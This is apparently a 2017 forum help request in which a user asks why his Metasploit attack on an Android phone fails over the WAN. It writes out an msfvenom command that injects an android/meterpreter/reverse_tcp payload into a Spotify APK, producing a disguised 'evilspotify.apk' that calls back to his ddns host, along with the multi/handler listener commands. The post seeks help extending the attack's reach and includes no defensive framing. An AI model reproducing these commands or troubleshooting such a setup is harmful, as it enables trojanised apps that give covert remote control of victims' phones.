Help with Metasploit Attack Over WAN (Android)

Jan 19, 2017 07:25 PM
Jan 19, 2017 08:43 PM
636204200421581570.jpg

Hi,

I'm trying to do an attack over WAN but I'm having a few problems, this the procedure that I'm doing in this moment:

msfvenom -p android/meterpreter/reverse_tcp -x /root/Desktop/spotify.apk -k HOST=°°°°.ddns.net (Static Public IP) LPORT=4444 -o /root/Desktop/TrojanWAN/apk/evilspotify.apk

While, into the Meterpreter console I put this:

*use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

set LHOST °°°°.ddns.net (Same for the Payload)

set LPORT 4444

set ReverseListnerBindAddress 192.168.0.14 (Static local IP)

run*

When I start to listen this is the result:

636204200421581570.jpg

I think I've opened correctly the port 4444:

636204204721589441.jpg

When I check with canyouseeme.org, if the console is listening the port result opened while If the console isn't, the port result closed, is it normal?

636204210755195768.jpg
636204212170930583.jpg
636204210755195768.jpg
636204212170930583.jpg

If the telephone is in the same network of the attacker's machine I can listen it, but if it is connected to another wifi I can listen it, where is the problem?

Thanks,

Alessio

Comments

No Comments Exist

Be the first, drop a comment!